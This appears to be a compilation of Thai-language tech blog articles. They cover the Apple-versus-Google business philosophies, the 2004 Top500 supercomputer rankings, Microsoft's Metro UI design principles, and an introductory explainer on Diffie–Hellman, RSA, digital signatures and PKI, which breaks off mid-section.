[Robust Defenses for Cross-Site Request Forgery (PDF)](http://seclab.stanford.edu/websec/csrf/csrf.pdf)
# แอปเปิล vs กูเกิล - ความแตกต่างที่ลงลึกตั้งแต่ปรัชญารากฐานของบริษัท ช่วงนี้มีวิวาทะ iPhone vs Android กลับมาอีกครั้ง ([ดูบทความต้นทางที่ Droidsans](http://droidsans.com/iphone6s-features-in-short-summary)) เรื่องแบบนี้เถียงกันไปยังไงก็ไม่มีทางจบ คำถามที่น่าสนใจกว่าคือทำไมสาวกและแฟนบอยทั้งสองค่ายถึงเถียงกันอยู่ตลอดเวลา คำตอบที่ผมพยายามอธิบายคือความต่างระหว่าง 2 ค่ายนี้ มันเป็นความแตกต่างที่ลงไปลึกถึงระดับปรัชญาหรือรากฐาน (fundamentalism) ของบริษัทที่คงไม่มีใครถูกผิด (และประสบความสำเร็จกันทั้งคู่) ส่วนรายละเอียดของความแตกต่างจะอธิบายในบทความนี้ ### แอปเปิล: Materialism ฝั่งของแอปเปิลมีปรัชญารากฐานที่สรุปได้ในคำเดียวว่า **"materialism"** หรือการนิยมสิ่งที่เป็นวัตถุจับต้องได้ ที่ผ่านมาเราจึงเห็นแอปเปิลนิยมนำเสนอจุดเด่นของตัวเองในเชิง enthusiastic ต่อตัววัตถุในทุกมิติ เช่น วัสดุดีกว่า หรูหรามีระดับ ประสบการณ์ใช้งานดีกว่า หน้าสวยกว่า UI ลื่นกว่า ฯลฯ สรุปคือในภาพรวมแล้วมันเป็น "ที่สุดของ material" ที่หาใครสู้ได้ยากนั่นเอง ตัวอย่างที่ดีที่สุดของการแสดงออกเรื่อง materialism ของแอปเปิล คือทุกครั้งที่มีเปิดตัวสินค้าใหม่ เราจะเห็นวิดีโอบรรยายสรรพคุณโดย Jonathan Ive นี่ล่ะครับ ใช่เลย โมเดลธุรกิจทั้งหมดของแอปเปิลจึงมุ่งเข้าสู่การขายวัตถุ (ฮาร์ดแวร์) เป็นหลัก เพราะพื้นฐานของบริษัทที่ให้ความสำคัญกับ "ความเป็นวัตถุ" นั่นเอง เราจึงเห็นแอปเปิลเลิกคิดเงินค่าซอฟต์แวร์ (ยกเว้นบริการเพียงบางตัว เช่น iTunes ที่ถือว่าเป็นสัดส่วนรายได้ส่วนน้อยของบริษัท) และมองซอฟต์แวร์ในฐานะตัวสร้างมูลค่าเพิ่ม (value added) ให้แพ็กเกจฮาร์ดแวร์ของตัวเองแตกต่างจากคู่แข่ง (differentiation) และสามารถขายในราคาที่สูงขึ้นได้ ### กูเกิล: Immaterialism ส่วนกูเกิลนั้นกลับทิศกันเลย แนวคิดของกูเกิลคือไร้สิ้นซึ่งวัตถุใดๆ และทุกสิ่งอย่างในโลกหล้าจงดึงมาจากคลาวด์ของกูเกิลเท่านั้นเป็นพอ ผมขอใช้คำว่า **immaterialism** ของคุณอธิป จิตตฤกษ์ มานิยามแนวคิดนี้ ([อ่านเพิ่ม](https://www.facebook.com/events/727813013955660/), [วิดีโอประกอบการบรรยาย](https://www.youtube.com/watch?v=oTeQSTWW9gg)) ฮาร์ดแวร์ Android ในสายตาของกูเกิลจึงมีค่าเป็นแค่ dumb terminal หรืออุปกรณ์ง่ายๆ ราคาถูก ตัวมันเองไม่ต้องมีความฉลาดหรือความสามารถมากนัก แต่ภารกิจสำคัญของมันคือเปิดทางให้คนเข้าสู่โลกออนไลน์ที่ไร้ซึ่งวัตถุของกูเกิลได้ ถ้าเรียกภาษาเศรษฐศาสตร์ กูเกิลมองฮาร์ดแวร์เป็น commodity ที่ใครก็ผลิตขึ้นมาได้ (ไม่จำเป็นต้องเป็นซัมซุง จะเป็นโรงงานเสิ่นเจิ้นก็ได้ หรือเดี๋ยวนี้อินเดีย-บราซิลก็เริ่มตั้งโรงงานเองแล้ว) โครงการ Nexus ถือเป็นแค่ การทดลองในวงกว้างเพื่อผลักดันความก้าวหน้าของแพลตฟอร์มซอฟต์แวร์เท่านั้น เราจึงไม่เห็นแนวคิดเรื่อง enthusiastic ใดๆ ฝั่งอยู่ใน Nexus เลย (Eric Schmidt เคยพูดไว้นานแล้วว่ากล้อง Nexus จะเทพในไม่ช้า ตอนนี้ก็ยังไม่เกิดขึ้นจริง) ในขณะที่โครงการ Android One เป็นการสร้าง standardized dumb terminal ให้กระจายตัวกว้างขวางมากที่สุดเท่าที่เป็นไปได้ แต่วิสัยทัศน์เชิงซอฟต์แวร์ของกูเกิลนั้นลึกล้ำมาก แนวคิดของกูเกิลคือสร้างความฉลาดของจักรกล (machine intelligence) ซ่อนอยู่ที่ไหนสักแห่งหนึ่งบนโลก แล้วให้จักรกลที่ว่านี้แก้ปัญหาให้ผู้ใช้งาน โดยที่ไม่ต้องเห็นหน้าค่าตาหรือสัมผัสเชิงกายภาพกันเลย เราจะเห็นแนวคิดนี้ถูกผลิตซ้ำอยู่ในผลิตภัณฑ์แทบทุกตัวของกูเกิล ตั้งแต่ - Google Search ที่เป็นต้นกำเนิดของบริษัท และฉลาดขึ้นเรื่อยๆ จากโครงการ Knowledge Graph - Google Now ที่ไร้บุคลิก ต่างจาก Siri/Cortana - รถยนต์ไร้คนขับ ที่ให้ความรู้สึกว่ามี machine อะไรบางอย่างขับรถให้เรา - Google Glass มี machine อะไรสักอย่างสแกนข้อมูลรอบตัว แล้วช่วยแสดงข้อมูลให้เรา วิดีโอสาธิต Google Self-Driving Car อันนี้ น่าจะสะท้อนแนวคิดเรื่อง "ไร้ตัวตน" ของกูเกิลได้ดีที่สุดครับ ถ้าลองเปรียบเทียบกับ "การเดินทาง" แล้ว ฝั่งแอปเปิลจะใส่ใจรายละเอียดระหว่างทาง ในขณะที่กูเกิลจะสนใจพาเราวาร์ปจากต้นทางไปโผล่ปลายทางให้เร็วที่สุด อะไรประมาณนี้ครับ โมเดลธุรกิจของกูเกิลจึงไม่สนใจฮาร์ดแวร์อย่างสิ้นเชิง และผลักดันทุกอย่างให้อยู่ภายใต้การหารายได้จากโฆษณา (ads) หรือบริการแบบสมัครสมาชิก (subscription) ให้หมดนั่นเอง ทีนี้ใครจะชอบแนวทางไหน ก็ขึ้นกับปรัชญาการใช้ชีวิตของแต่ละคนแล้วว่าจะเป็นสาย immaterial หรือ material ครับ (เหมือนกับคนเชียร์บาร์เซโลนาต้อง tiki taka ส่วนคนเชียร์เชลซี ชอบนั่งรถบัส อะไรแบบนั้น คนละแนวทางแต่เป็นแชมป์ยุโรปได้เหมือนกัน) อีกประเด็นที่ผมคิดว่าน่าสนใจคือขนาดของตลาด ลูกค้าที่มีกำลังซื้อสินค้าของแอปเปิล อาจมีอย่างมากสัก 300-500 ล้านคน (อันนี้ตัวเลขเดามั่วๆ แบบไร้หลักการ) แต่เป็นลูกค้าชั้นดีที่มีกำลังจ่าย พอคูณส่วนต่างกำไร (margin) แล้วส่งผลให้แอปเปิลทำกำไรมหาศาล และกลายเป็นบริษัทที่มีมูลค่าสูงที่สุดในโลกในปัจจุบัน ตอบโจทย์แง่ธุรกิจเป็นอย่างมาก แต่ที่น่ากลัวมากคือกูเกิล ที่คาดว่ามองไกลระดับฐานลูกค้าจำนวน three to five billions ในแง่กำไรระยะสั้น คูณออกมาแล้วอาจได้เยอะไม่เท่า แต่ในแง่อิทธิพลการครอบงำโลกนั้นเยอะกว่าอย่างเทียบไม่ติด เมื่อครั้งที่กูเกิลตั้งบริษัท Alphabet Holding มีบทความฝรั่งบางรายเปรียบเทียบว่า ความยิ่งใหญ่ของมันจะเทียบเท่ากับบริษัทอินดีสตะวันออก ([East India Company](https://en.wikipedia.org/wiki/East_India_Company)) ของชาติมหาอำนาจยุโรปในยุคล่าอาณานิคมเอเชียเลยทีเดียว
# เปิดโลก Super Computer เผอิญผมอยู่ในสายนี้เหมือนกัน เปิดอ่าน Top500 ของ Super Computer ของโลกเราทุกวันนี้ฉบับเดือนมิถุนา 2004 เห็นความเปลี่ยนแปลงหลายๆ อย่างครับ รายชื่ออันเก่าคือ พ.ย. 2003 อันใหม่คือ มิ.ย. 2004 เปิดสองอันนี้เทียบกันดู อันดับหนึ่งยังเป็นของ Earth Simulator จากญี่ปุ่น ใช้ชิปของ NEC (ซึ่งยังดังพอสมควรในบ้านเค้า ในขณะที่ NEC บ้านเราไม่มีใครรู้จักเลย) ชิปเป็น NEC Vector งานหลักคือเอาไว้คำนวณแผ่นดินไหวตามชื่อละครับ มันรันอยู่ที่พีค 40 เทอราฟลอบ (เมืองไทยยังทำได้หลัก 10 กิกะฟลอบเท่านั้นเอง) ตัว EarthSim นี้ค่อนข้างดังอยู่อันดับ 1 มาหลายปียังไม่มีใครโค่นลงได้ อันดับถัดๆ มามีการเปลี่ยนแปลงบ้างเล็กน้อย แต่ก็ยังหน้าเดิมๆ สับไปสับมาระหว่าง 3 ศูนย์ใหญ่จากสหรัฐ คือ ห้องแล็บ Lawrence Livermore National Laboratory กับ Los Alamos National Laboratory แล้วก็ The National Center for Supercomputing Applications (NCSA) ที่ที่เว็บบราวเซอร์ Mosaic เกิดล่ะครับ ขึ้นอยู่กับว่าคอมจาก 3 แห่งนี้ที่ไหนจะใหม่กว่ากัน 2 แล็บแรกคำนวณนิวเคลียร์ครับ เลยจำเป็นต้องมีของแรงไว้ใช้ สิ่งที่น่าสนใจคือ คอมพิวเตอร์ตระกูล ASCI ของ 2 แล็บแรกติดอันดับกันหลายตัว ตั้งแต่ ASCI Blue, ASCI Red, ASCI White และตัวใหม่ ASCI Q ตอนนี้อยู่ที่ 3 สิ่งน่าสนใจถัดมาคือ IBM ครับ ลองไล่ดูในลิสต์จะเห็นว่ามีคอมจาก IBM ติดอันดับกันเกินครึ่งเลย ไม่ว่าจะเป็นชิป Xeon, Itanium, Opteron หรือ Power4+ ก็ตาม ศูนย์วิจัยใหญ่ๆ ของ IBM อย่าง Thomas Watson Research Center (ตั้งชื่อตามผู้ก่อตั้ง IBM รายละเอียดอ่านได้จากหนังสือ 'ทำไมช้างไม่เต้นระบำ') ก็มีคอมติดท็อปเท็นเหมือนกัน อันดับรองๆ ลงมามี HP, Dell, NEC และ Cray แจมๆกันประปราย แสดงให้เห็นถึงความแข็งแกร่งในด้าน HPC (High Performance Computing) ของ IBM อย่างแท้จริง สิ่งที่น่าแปลกใจคือ System X จาก Virginia Tech ซึ่งใช้ซีพียู G5 จากแอปเปิล 1100 ตัว อันดับ 3 ของคราวที่แล้วหายไปเฉยเลย ผมเลยตามรอยไปมาพบว่าเค้ากำลังอยู่ระหว่างการอัพเกรด (จริงๆ เรียกว่ารื้อใหม่หมด) เปลี่ยน G5 ธรรมดาให้เป็น XServe G5 (สำหรับเซิร์ฟเวอร์) แทน เพื่อให้รองรับแรมแบบ error correcting code (ECC) ด้วย สาวกแอปเปิลรับทราบกันนะครับ แชมป์คราวหน้าอาจกลับมาเป็นของยักษ์เก่าอย่าง Cray ครับ จากข้อมูลใน Wikipedia พบว่า Cray กำลังทำ 50 เทอราฟลอบ กับ 41 เทอราฟลอบให้รัฐบาลสหรัฐอยู่
# Metro UI บน Windows Phone แท้จริงแล้วคืออะไร?, แอพ Twitter ยังคง Metro UI ไว้สมบูรณ์ ตั้งแต่ Microsoft และ Twitter ได้ออกแอพพลิเคชัน Facebook Beta และ Twitter เวอร์ชันใหม่ ที่มีการออกแบบแตกต่างไปจากสิ่งที่คนใช้ Windows Phone คุ้นเคยอย่างหน้าแอพพลิเคชันแบบ panorama หรือ pivot ที่มีหัวข้อเป็นข้อความขนาดใหญ่ ที่ผู้ใช้ต้องสไลด์ซ้ายขวา กลับกลายมามีหน้าตาคล้ายคลึงกับแอพพลิเคชันเดียวกันในแพลตฟอร์มอื่นๆ แต่รู้หรือไม่ว่า Facebook Beta และ Twitter บน Windows Phone นั้น แท้ที่จริงแล้วยังคงสิ่งที่เราเรียกว่า Metro UI ไว้อย่างสมบูรณ์แบบ Metro UI ในช่วงแรกๆ นั้นต่างจากการออกแบบของระบบปฏิบัติการมือถือแพลตฟอร์มอื่นๆ เป็นอย่างมาก ยกตัวอย่างเช่น iOS ของ Apple จะเน้นไปในการออกแบบเสมือนวัตถุจริง (skeuomorph) ซึ่งไอคอนและหน้าแอพพลิเคชันถูกลงรายละเอียดให้เสมือนจริง อย่างชั้นวางหนังสือของ Newsstand สันหนังและรอยฉีกกระดาษของ Notes เป็นต้น ในช่วงแรกๆ Android ของ Google ก็เดินทางมาในลักษณะเดียวกับการออกแบบของ Apple ที่คงความรู้สึกเสมือนจริงเข้าไปในการออกแบบซอฟต์แวร์ แต่เริ่มเปลี่ยนแปลงในยุคสมัยที่ Android นั้นมีธีมของการออกแบบแอพพลิเคชันที่ชื่อ Holo ซึ่งเน้นการจัดวางที่เรียบง่ายและมีแบบแผนมากขึ้น ใกล้เคียงกับหลักการออกแบบของ Metro UI (เห็นได้จากแอพพลิเคชัน Google Play เวอร์ชันล่าสุด) **หลักการที่สำคัญที่สุดในการออกแบบแบบ Metro UI คือ "Content over Chrome - Flat and Minimalistic"** ซึ่งเป็นการทำให้เนื้อหาและข้อมูลโดดเด่นโดยการขจัดลายเส้น สี แสง เงา ที่มาประดับตกแต่งในแอพพลิเคชัน เป็นหลักการข้อแรกในการออกแบบให้เข้ากับสิ่งที่ Microsoft เรียกว่า "Metro UI" ชื่อเรียกหลักการออกแบบที่ Microsoft เริ่มใช้แพร่หลายในยุค Windows Phone 7 (แต่สามารถเริ่มเห็นได้ในผลิตภัณฑ์อย่าง KIN และ Zune ของ Microsoft) ซึ่งได้แรงบันดาลใจมาจากป้ายในที่สาธารณะต่างๆ ไม่ว่าจะเป็นสนามบิน สถานีรถไฟ ซึ่งถูกออกแบบมาเพื่อให้คนที่เห็นสามารถเข้าใจได้อย่างรวดเร็วในมหานครที่พลุกพล่าน **"Metro UI ได้เริ่มเป็นแรงบันดาลใจให้กับการออกแบบแอพพลิเคชันบนแพลตฟอร์มอื่นๆ เริ่มที่ Twitter"** อาจจะเพราะว่าคนที่ออกแบบแอพพลิเคชัน Twitter บน Windows Phone และ Android คนปัจจุบัน (Mike Kruzeniski - Twitter Design Lead) เคยเป็นหัวหน้าทีมออกแบบยูเซอร์อินเตอร์เฟสบน Windows Phone (และย้อนไปถึงสมัยของ KIN) และเป็นหนึ่งในคนที่มาวางหลักการของ Metro UI ทำให้แอพพลิเคชัน Twitter บน Windows Phone ได้ถูกออกแบบมาให้ตรงกับหลักการของ Metro UI อย่างสมบูรณ์แบบ และยังส่งผลกระทบไปถึงแอพพลิเคชัน Twitter บน Android อีกด้วย **"การออกแบบให้ตรงหลักการของ Metro UI ไม่ได้แปลว่าแอพพลิเคชันจะต้องใช้เท็มเพลต panorama หรือ pivot อย่างเดียว"** Stéphane Massey นักออกแบบที่มีความคุ้นเคยกับการออกแบบตามหลักการของ Metro UI และเป็นผู้เขียนบทความ Metro UI Design Principles ที่มีเนื้อหาตรงไปตรงมาและเข้าใจง่ายเกี่ยวกับการออกแบบบน Metro UI กล่าวไว้ว่า ฟอนต์ Segoe หน้าตาแอพพลิเคชันแบบพาโนรามา หรือแบบไพวอท เป็นเพียงแค่ประสบการณ์แรก (out-of-the-box experience) ที่ผู้ใช้จะได้รับเมื่อพบกับ Metro UI เป็นครั้งแรก ผู้ออกแบบแอพพลิเคชันสามารถใช้ฟอนต์ Helvetica (หรือฟอนต์อื่นๆ) การจัดวางข้อมูลในแอพพลิเคชันรูปแบบอื่นๆ โดยยังคงทำตามหลักการของ Metro UI คือให้ความสำคัญกับเนื้อหามากกว่าความสวยงามของเส้น สี แสง เงา (แปลว่าแอพพลิเคชันจะต้องไม่ใช้สีสันตกแต่งหรือใช้การไล่สี เพื่อให้ดูนูนหรือมีมิติเสมือนจริง ไม่ใส่เงาใต้ตัวอักษรหรือปุ่มต่างๆ ตัดเส้นแบ่งหรือลวดลายที่ไม่จำเป็นออกไป) แอพพลิเคชันนั้นก็ยังถือว่าเป็นแบบ Metro UI อยู่ ซึ่งเราจะเห็นได้ว่า Facebook Beta บน Windows Phone นั้น มีความแตกต่างที่สำคัญจากแอพพลิเคชัน Facebook บนแพลตฟอร์มอื่นๆ คือ การนำเงาและเส้นคั่นที่ไม่จำเป็นต่างๆ ออกไป การไม่ไล่สีในแถบด้านบน เป็นต้น ทำให้ Facebook Beta บน Windows Phone นั้นมีการออกแบบตรงตามหลักการของ Metro UI อย่างสมบูรณ์ Metro UI ไม่ใช่หลักการออกแบบที่เพิ่งเกิดขึ้นมาใหม่ แต่เป็นการประยุกต์มาจากหลักการออกแบบแบบ swiss style ซึ่งเป็นแรงบันดาลใจให้เกิดการออกแบบที่เรียบง่าย ให้ข้อมูลได้เพียงพอและรวดเร็ว แนวคิด flat design และการออกแบบแบบ minimalism ก็เป็นหนึ่งในแรงบันดาลใจของ Metro UI เช่นเดียวกัน ในอนาคตอันใกล้เราจะได้เห็นการออกแบบแบบนี้ได้รับความนิยมแพร่หลายออกมานอก Microsoft มากขึ้น เพราะ Metro UI ได้พิสูจน์ให้เห็นว่า ความสวยงามของหนังสือ ไม่ได้อยู่ที่ลวดลายของเนื้อกระดาษ หรือลวดลายของสันปกหนัง แต่อยู่ในตัวหนังสือที่เรียงออกมาเป็นเนื้อเรื่องให้เราได้อ่าน (ปัจจุบัน Metro UI เป็นโค้ดเนมของการออกแบบที่ Microsoft ไว้เรียกใช้ภายใน เนื่องจากมีปัญหาการใช้ชื่อ โดยเปลี่ยนชื่อที่ใช้ในสาธารณะเป็น Microsoft Design Language) ที่มา \- [Metro UI Design Principle](http://www.stephanemassey.com/metro-design-principles/), [From Transportation to Pixels](http://kruzeniski.com/2011/from-transportation-to-pixels/), [The Microsoft Design Language](http://channel9.msdn.com/Events/Build/2012/2-116), [Twitter by Mike Kruzeniski](http://kruzeniski.com/twitter-for-windows-phone/), [ทวีตจาก Mike Kruzeniski](https://twitter.com/mkruz/status/331185587874844672)
# Asymmetric Cryptography: แตกต่างแต่เข้าใจกัน กระบวนการเข้ารหัสที่สำคัญอย่างแบบกุญแจสมมาตร (symmetic key encryption) ในตอนที่แล้วแม้จะสามารถป้องกันการดักฟังได้อย่างมีประสิทธิภาพ แต่ข้อจำกัดคือทั้งสองฝ่ายต้องรับรู้ “ความลับ” ร่วมกัน และข้อจำกัดที่สำคัญมากคือ ผู้ที่รู้ความลับนี้ทุกคนจะเข้าไปอ่านข้อความได้ทั้งหมด การใช้งานในอินเทอร์เน็ตนั้นต่างออกไป ส่วนมากเรามักจะรับรู้ว่าเราต้องการติดต่อกับใคร เช่น เราต้องการเข้าเว็บไซต์ซักเว็บและเราต้องการแน่ใจว่าเว็บนั้นเป็นเว็บที่เราตั้งใจจะเข้าใช้งานจริง ต้องไม่มีใครปลอมตัวเป็นเว็บนั้นได้ หรือไม่มีใครอ่านข้อความที่เรากับเว็บนั้นๆ สื่อสารถึงกันได้ กระบวนการเข้ารหัสแบบกุญแจไม่สมมาตร (asymmetric key encryption) เป็นกระบวนการเข้ารหัสที่เปิดให้ผู้ส่งข้อมูลกับผู้รับข้อมูลสามารถใช้กุญแจคนละชุดกัน ที่สร้างมาคู่กันโดยเฉพาะ แล้วสร้างการเชื่อมต่อที่เข้ารหัสถึงกันได้ ### การแลกกุญแจแบบ Diffie–Hellman Diffie–Hellman (DH) เป็นกระบวนการสร้าง “ความลับ” ระหว่างกันโดยไม่ต้องส่งความลับนั้นถึงกันจริงๆ โดยทั่วไปแล้วความลับที่ว่าคือการแลก “กุญแจ” สำหรับการเข้ารหัสแบบกุญแจสมมาตรเพื่อส่งข้อมูลถึงกันต่อไป กระบวนการ DH นี้ไม่สามารถเข้ารหัสโดยตัวมันเองได้ เพียงแต่บอกกระบวนการสร้างความลับร่วมกันเท่านั้น การอธิบายกระบวนการ DH นั้นอาศัยความจริงที่ว่า (n^a)^b mod p = (n^b)^a mod p เมื่อเราใช้ค่า (n^a)^b mod p นี้เป็นค่ากุญแจสำหรับการเข้ารหัสแบบกุญแจสมมาตร เราสามารถแลกค่า n และ p อย่างเปิดเผยได้ โดย a และ b เป็นความลับที่แต่ละฝ่ายต้องเก็บไว้กับตัว สิ่งที่แต่ละฝ่ายส่งให้กันคือค่า n^a mod p และ n^b mod p เมื่ออีกฝ่ายนำไปยกกำลังกับความลับของตัวเองก็จะได้ตัวเลขชุดที่เหมือนกันทั้งสองฝั่ง หากแฮกเกอร์ไม่รู้ทั้งค่าความลับของทั้งสองฝั่ง ก็ไม่สามารถถอดรหัสได้ 1. ทั้งสองฝ่ายต้องสร้างตัวเลขลับสำหรับตัวเองขึ้นมา 2. ฝ่ายเริ่มต้นส่งพารามิเตอร์ คือ n และ p ให้กับอีกฝ่าย 3. ทั้งสองฝ่ายแลกค่า A = n^a mod p และ B = n^b mod p ให้อีกฝ่าย 4. ทั้งสองฝ่ายมีความลับร่วมกันที่คนอื่นไม่สามารถรับรู้ได้ กระบวนการ DH ยังคงได้รับความนิยมอยู่จนทุกวันนี้ในการแลกกุญแจการเชื่อมต่อ แต่โดยตัวกระบวนการ DH เองไม่มีการยืนยันว่าฝ่ายตรงข้ามเป็นคนที่เราต้องการพูดคุยด้วยจริงหรือไม่ เราเรียกการเชื่อมต่อแบบ DH ที่ไม่มีการยืนยันตัวตนนี้ว่า Anonymous DH (ADH) กระบวนการนี้แม้จะทนทานต่อการดักฟัง แต่หากมีคนร้ายปลอมตัวเป็นฝ่ายตรงข้ามที่เราต้องการคุยด้วย (การโจมตีแบบ man-in-the-middle) โดยคนร้ายเชื่อมต่อกับเราด้วยกระบวนการ DH และเชื่อมต่อกับปลายทางด้วย DH เหมือนกันก็จะดักทุกอย่างได้ทันที เราสามารถสร้างเซิร์ฟเวอร์แบบ ADH ได้ง่ายๆ ด้วยการใช้ OpenSSL ที่มีติดตั้งอยู่ในลินุกซ์ส่วนมาก ด้วยคำสั่ง `openssl s_server -nocert -cipher aNULL` ในฝั่งเซิร์ฟเวอร์ และ `openssl s_client -cipher aNULL` ในฝั่งไคลเอนต์ ก็สามารถเชื่อมต่อแบบเข้ารหัสได้ทันที โดยที่การเข้ารหัสแบบกุญแจสมมาตรนั้นจะมีการเลือกให้โดยอัตโนมัติ ขึ้นกับเวอร์ชั่นของ OpenSSL ที่ใช้งานนั้นซัพพอร์ตกระบวนการใดบ้าง ### RSA กระบวนการเข้ารหัสที่ดังที่สุดอันหนึ่งของโลกคงเป็น RSA ที่ยังเป็นชื่อของบริษัทขายสินค้าความปลอดภัยชื่อดังในตัว (ปัจจุบัน RSA เป็นบริษัทในเครือ EMC) RSA ต่างจากกระบวนการ DH เพราะมันเป็นกระบวนการ “เข้ารหัส” อย่างเต็มรูปแบบ โดยไม่ต้องการกระบวนการเข้ารหัสอื่นๆ มาเสริมอีก เราสามารถเข้ารหัสไฟล์ข้อมูลขนาดใหญ่ด้วยกระบวนการ RSA ได้ แม้จะไม่เป็นที่นิยมนักเพราะกระบวนการกินพลังประมวลผลสูง กระบวนการ RSA เริ่มจากการสุ่มเลขจำนวนเฉพาะขนาดใหญ่สองตัวเพื่อสร้างกุญแจที่เป็นคู่กันและกันแล้วสร้างเป็นกุญแจคู่หนึ่ง ที่จะถอดรหัสได้จากคู่ของมันเท่านั้น กระบวนการแบบนี้ทำให้ในการใช้งานจริง เรามัก “แจก” กุญแจฝั่งหนึ่งให้ทั่วโลกได้เห็น แล้วเรียกมันว่ากุญแจสาธารณะ จากนั้นจึงเก็บอีกฝั่งหนึ่งไว้เป็นความลับกับตัวเราเอง ในกระบวนการเข้ารหัสการเชื่อมต่อ ที่เราต้องการใช้กุญแจสมมาตร เราอาจจะให้ฝั่งใดฝั่งหนึ่ง สร้างกุญแจขึ้นมาด้วยกระบวนการสุ่ม แล้วส่งให้กับอีกฝ่ายหนึ่งด้วยการเข้ารหัสกุญแจด้วยกระบวนการ RSA โดยใช้กุญแจสาธารณะของอีกฝ่าย ซึ่งจะทำให้มีเพียงเจ้าของกุญแจเท่านั้นที่อ่านได้ ### ลายเซ็นดิจิตอล กระบวนการยืนยันความถูกต้องของเอกสารนั้นมีความสำคัญเป็นอย่างยิ่งในโลกออนไลน์ หลายครั้งที่เราไม่ต้องการปิดบังความลับในเอกสารแต่อย่างใด แต่เราต้องการยืนยันว่าเอกสารนั้นมาจากเราจริง กระบวนการเซ็นดิจิตอลสามารถทำได้ด้วยกระบวนการ RSA โดยใช้กุญแจลับมาเข้ารหัสค่าแฮชของเอกสารแล้วแนบค่าแฮชนั้นติดไปกับเอกสาร เมื่อผู้รับสารได้รับ ก็สามารถแฮชเอกสารจนได้ค่าแฮชมาแล้วถอดรหัสลายเซ็นดิจิตอลด้วกุญแจสาธารณะของผู้ลงลายเซ็นแล้วดูว่าค่าแฮชนั้นตรงกันหรือไม่ ถ้าตรงกันก็แสดงว่าลายเซ็นถูกต้อง ### Public Key Infrastructure (PKI) คำถามสุดท้ายในระบบกุญแจสาธารณะคือเราจะรู้ได้อย่างไรว่ากุญแจสาธารณะที่เราได้มานั้นเป็นของใคร แม้ในไฟล์กุญแจอาจจะแจ้งที่มาของตัวเอง แต่เราจะรู้ได้อย่างไรว่าเจ้าของกุญแจนั้นเป็นตัวจริง ระบบโครงสร้างพื้นฐานกุญแจสาธารณะ ระบุให้เราต้องมีหน่วยงานที่รู้จักตั้งแต่แรกอยู่ในเครื่องของเราเสียก่อนเรียกว่าหน่วยงานออกใบรับรอง (Certification Authority - CA) หน่วยงานเหล่านี้มักทำงานร่วมกับผู้ผลิตระบบปฎิบัติการ, ผู้ผลิตเบราว์เซอร์, หรือแม้แต่ผู้ผลิตไลบรารีความปลอดภัย เพื่อยืนยันว่าหน่วยงานของตัวเองมีความปลอดภัยอย่างเพียงพอ มีกระบวนการตรวจสอบผู้ที่จะมาขอให้รับรองกุญแจสาธารณะของตัวเองได้อย่างครบถ้วน เมื่อผ่านกระบวนการตรวจสอบในระดับหนึ่งแล้ว ผู้ผลิตซอฟต์แวร์ก็จะรวมเอากุญแจสาธารณะของหน่วยงานเหล่านี้เข้าไว้ในซอฟต์แวร์ของตัวเอง (ตัวอย่างรายชื่อ[หน่วยงานที่ Mozilla/Firefox รวมกุญแจสาธารณะไว้](https://www.mozilla.org/projects/security/certs/included/)) สำหรับผู้อื่นที่ต้องการใช้มีการรับรองกุญแจสาธารณะของตัวเอง ต้องสร้างกุญแจสาธารณะขึ้นมาในเครื่องของตัวเองเป็นไฟล์ที่เรียกว่าไฟล์ CSR (Certificate Signing Request) แล้วส่งไปยังหน่วยงานที่ได้รับการรับรองเหล่านี้ จากนั้นหน่วยงานเหล่านี้จะมีการยืนยันตัวตน เช่น การส่งอีเมลมาขอยืนยัน, หรือกระทั่งการขอเอกสารทางราชการในบางกรณี เมื่อยืนยันตามกระบวนการแล้วหน่วยงานเหล่านี้จะใช้กุญแจลับของตนเองเซ็นลายเซ็นดิจิตอล ซึ่งก็คือค่าแฮชของข้อมูลในไฟล์ CSR แล้วเข้ารหัส แล้วส่งกลับมายังผู้ร้องขอเป็นไฟล์รับรอง (Certificate - CRT) ในระบบการรับรองนั้นหน่วยงานที่ทำงานร่วมกับผู้ผลิตซอฟต์แวร์จริงมักมีน้อยไม่เกินหนึ่งร้อยราย และกระบวนการติดต่อเพื่อขอรับรองจะใช้เวลานานและเงินทุนที่สูงมาก แต่หน่วยงานที่ได้รับความเชื่อถือจากซอฟต์แวร์เหล่านี้แล้วมีสิทธิที่จะรับรองหน่วยงานรับรองอื่นๆ เรียกว่าเป็นหน่วยงานขั้นกลาง (Intermediate CA) เพื่อไปรับรองใบรับรองจริงๆ ต่อไป โดยที่ซอฟต์แวร์เช่นเบราว์เซอร์ จะไล่ดูว่าสุดท้ายแล้วหน่วยงานสุดท้ายที่รับรองกุญแจมานั้นอยู่ในรายชื่อของหน่วยงานที่เชื่อถือหรือไม่ ถ้าเชื่อถือก็จะให้ผู้ใช้เข้าใช้งาน แต่ถ้าไม่เชื่อถือก็จะขึ้นหน้าจอแจ้งเตือนผู้ใช้ เราสามารถสร้างไฟล์รับรองขึ้นมาเองได้โดยไม่ต้องไปขอหน่วยงานอื่นให้เซ็นแต่อย่างใด ไฟล์ประเภทนั้นเรียกว่าไฟล์รับรองตนเอง (Self Signed Certificate) ซึ่งเบราว์เซอร์จะขึ้นเตือนเมื่อใช้งานเสมอ ข่าวการรั่วไหลของระบบเครือข่ายของบริษัทให้บริการรับรองกุญแจสาธารณะ ทำให้หน่วยงานเหล่านี้เก็บรักษากุญแจลับของตัวเองหนาแน่นขึ้น ไม่ยอมให้ซอฟต์แวร์ต่างๆ เข้าถึงกุญแจลับได้โดยตรงอีกต่อไป วิธีการคือให้กุญแจลับเซ็นกุญแจสาธารณะของหน่วยงานขั้นกลางขึ้นมาอีกชั้น แล้วนำกุญแจลับของหน่วยงานขั้นกลางนี้ให้บริการอยู่ในคอมพิวเตอร์อัตโนมัติ หากระบบรั่วไหลจริง ก็สามารถยกเลิกหน่วยงานขั้นกลางนี้ไปแล้วแจ้งให้ซอฟต์แวร์ทั้งหมดยกเลิกความเชื่อถือหน่วยงานขั้นกลางนั้นไป ทุกวันนี้เวลาที่เราส่งไฟล์ CSR ไปยังหน่วยงานเหล่านี้เราจะได้รับไฟล์ CRT กลับคืนมาพร้อมกับไฟล์รับรองของหน่วยงานขั้นกลางนี้มาพร้อมกัน กระบวนการรับรองนี้สามารถรับรองได้หลายอย่าง นับแต่ชื่อโดเมนที่เราใช้กันโดยทั่วไป, อีเมลที่เราสามารถยืนยันได้ว่าเนื้อหาในอีเมลมาจากเราจริง, ไปจนถึงระบบสมาร์ตการ์ด การยืนยันอีเมลนั้นหน่วยงานให้ไฟล์รับรองออกมาเป็นไฟล์ที่เรัยกว่า PKCS #12 